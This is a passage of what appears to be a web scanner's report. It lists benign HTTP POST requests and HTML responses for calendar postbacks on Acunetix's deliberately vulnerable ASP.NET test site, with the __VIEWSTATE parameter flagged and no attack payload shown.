05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1135 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,135 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8437&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgAAGRfVB9sIZGRkkjheMQgbciQyTyr0dPBnQ0XEQMY%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKi%2Frq1BALQp5LlBALTp%2BrACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna%2F1AgLmna%2F1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ%2FmBQLmnZ%2FmBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY%2FcDALmnY%2FcDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE%2FAvukoT8C%2B6TV0wkC%2B6TV0wkC%2B6TJ9gIC%2B6TJ9gIC%2B6T9jQoC%2B6T9jQoC%2B6SRoAMC%2B6SRoAMC%2B6SFxwwC%2B6SFxwwC%2B6T5rAkC%2B6T5rAkC%2B6TtwwIC%2B6TtwwIC3Mv%2F6AUC3Mv%2F6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7%2BQ8C3Mu7%2BQ8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6%2BoCAtzL6%2BoCAtzL39MPAtzL39MPAtzL8%2FYIAtzL8%2FYIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBate1G7AVbvjIJQopNn1iD9nn7eN
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:04:32 GMT Content-Length: 12583
Response Body - size: 12,583 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgAAGRfVB9sIZGRkkjheMQgbciQyTyr0dPBnQ0XEQMY=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKi/rq1BALQp5LlBALTp+rACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna/1AgLmna/1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ/mBQLmnZ/mBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY/cDALmnY/cDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE/AvukoT8C+6TV0wkC+6TV0wkC+6TJ9gIC+6TJ9gIC+6T9jQoC+6T9jQoC+6SRoAMC+6SRoAMC+6SFxwwC+6SFxwwC+6T5rAkC+6T5rAkC+6TtwwIC+6TtwwIC3Mv/6AUC3Mv/6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7+Q8C3Mu7+Q8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6+oCAtzL6+oCAtzL39MPAtzL39MPAtzL8/YIAtzL8/YIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBate1G7AVbvjIJQopNn1iD9nn7eN" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">February 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8436')" style="color:Black" title="February 05">5</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8437')" style="color:White" title="February 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8438')" style="color:Black" title="February 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8439')" style="color:Black" title="February 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8440')" style="color:Black" title="February 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8441')" style="color:Black" title="February 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8442')" style="color:Black" title="February 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8443')" style="color:Black" title="February 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8444')" style="color:Black" title="February 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8445')" style="color:Black" title="February 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8446')" style="color:Black" title="February 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8447')" style="color:Black" title="February 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8448')" style="color:Black" title="February 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8449')" style="color:Black" title="February 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8450')" style="color:Black" title="February 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8451')" style="color:Black" title="February 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8452')" style="color:Black" title="February 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8453')" style="color:Black" title="February 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8454')" style="color:Black" title="February 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8455')" style="color:Black" title="February 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8456')" style="color:Black" title="February 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1109 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,109 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8441&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgAAwMD5CtsIZGRkqvuiyJ8nQFOaxeURw%2B5hfXVE1Oo%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLR6MlxAtCnkuUEAtOn6sAIAo33qKkGAo33qKkGAuadu94JAuadu94JAuadr%2FUCAuadr%2FUCAuadw4kKAuadw4kKAuad96wDAuad96wDAuad68MMAuad68MMAuadn%2BYFAuadn%2BYFAuads70NAuads70NAuadp9AGAuadp9AGAuadm7kDAuadm7kDAuadj9wMAuadj9wMAvukmcUPAvukmcUPAvukjZgHAvukjZgHAvukoT8C%2B6ShPwL7pNXTCQL7pNXTCQL7pMn2AgL7pMn2AgL7pP2NCgL7pP2NCgL7pJGgAwL7pJGgAwL7pIXHDAL7pIXHDAL7pPmsCQL7pPmsCQL7pO3DAgL7pO3DAgLcy%2F%2FoBQLcy%2F%2FoBQLcy5OPDQLcy5OPDQLcy4eiBgLcy4eiBgLcy7v5DwLcy7v5DwLcy6%2BcBwLcy6%2BcBwLcy8MwAtzLwzAC3Mv31wkC3Mv31wkC3Mvr6gIC3Mvr6gIC3Mvf0w8C3Mvf0w8C3Mvz9ggC3Mvz9ggCsdLdnwoCsdLdnwoCsdLxsgMCsdLxsgMCsdLlyQwCsdLlyQwCsdKZ7AUCsdKZ7AUCsdKNgw0CsdKNgw0CsdKhpgYCsdKhpgYCsdLV%2Bg8CsdLV%2Bg8CsdLJkQcCsdLJkQcCsdK9%2BQUCsdK9%2BQUCsdLRnQ0CsdLRnQ0CivmjBQKK%2BaMF7DKPxSpEhjeut6v0g35yB8PPiS4%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:16:10 GMT Content-Length: 12583
Response Body - size: 12,583 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgAAwMD5CtsIZGRkqvuiyJ8nQFOaxeURw+5hfXVE1Oo=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLR6MlxAtCnkuUEAtOn6sAIAo33qKkGAo33qKkGAuadu94JAuadu94JAuadr/UCAuadr/UCAuadw4kKAuadw4kKAuad96wDAuad96wDAuad68MMAuad68MMAuadn+YFAuadn+YFAuads70NAuads70NAuadp9AGAuadp9AGAuadm7kDAuadm7kDAuadj9wMAuadj9wMAvukmcUPAvukmcUPAvukjZgHAvukjZgHAvukoT8C+6ShPwL7pNXTCQL7pNXTCQL7pMn2AgL7pMn2AgL7pP2NCgL7pP2NCgL7pJGgAwL7pJGgAwL7pIXHDAL7pIXHDAL7pPmsCQL7pPmsCQL7pO3DAgL7pO3DAgLcy//oBQLcy//oBQLcy5OPDQLcy5OPDQLcy4eiBgLcy4eiBgLcy7v5DwLcy7v5DwLcy6+cBwLcy6+cBwLcy8MwAtzLwzAC3Mv31wkC3Mv31wkC3Mvr6gIC3Mvr6gIC3Mvf0w8C3Mvf0w8C3Mvz9ggC3Mvz9ggCsdLdnwoCsdLdnwoCsdLxsgMCsdLxsgMCsdLlyQwCsdLlyQwCsdKZ7AUCsdKZ7AUCsdKNgw0CsdKNgw0CsdKhpgYCsdKhpgYCsdLV+g8CsdLV+g8CsdLJkQcCsdLJkQcCsdK9+QUCsdK9+QUCsdLRnQ0CsdLRnQ0CivmjBQKK+aMF7DKPxSpEhjeut6v0g35yB8PPiS4=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">February 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8436')" style="color:Black" title="February 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8437')" style="color:Black" title="February 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8438')" style="color:Black" title="February 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8439')" style="color:Black" title="February 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8440')" style="color:Black" title="February 09">9</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8441')" style="color:White" title="February 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8442')" style="color:Black" title="February 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8443')" style="color:Black" title="February 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8444')" style="color:Black" title="February 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8445')" style="color:Black" title="February 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8446')" style="color:Black" title="February 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8447')" style="color:Black" title="February 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8448')" style="color:Black" title="February 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8449')" style="color:Black" title="February 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8450')" style="color:Black" title="February 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8451')" style="color:Black" title="February 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8452')" style="color:Black" title="February 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8453')" style="color:Black" title="February 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8454')" style="color:Black" title="February 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8455')" style="color:Black" title="February 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8456')" style="color:Black" title="February 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a 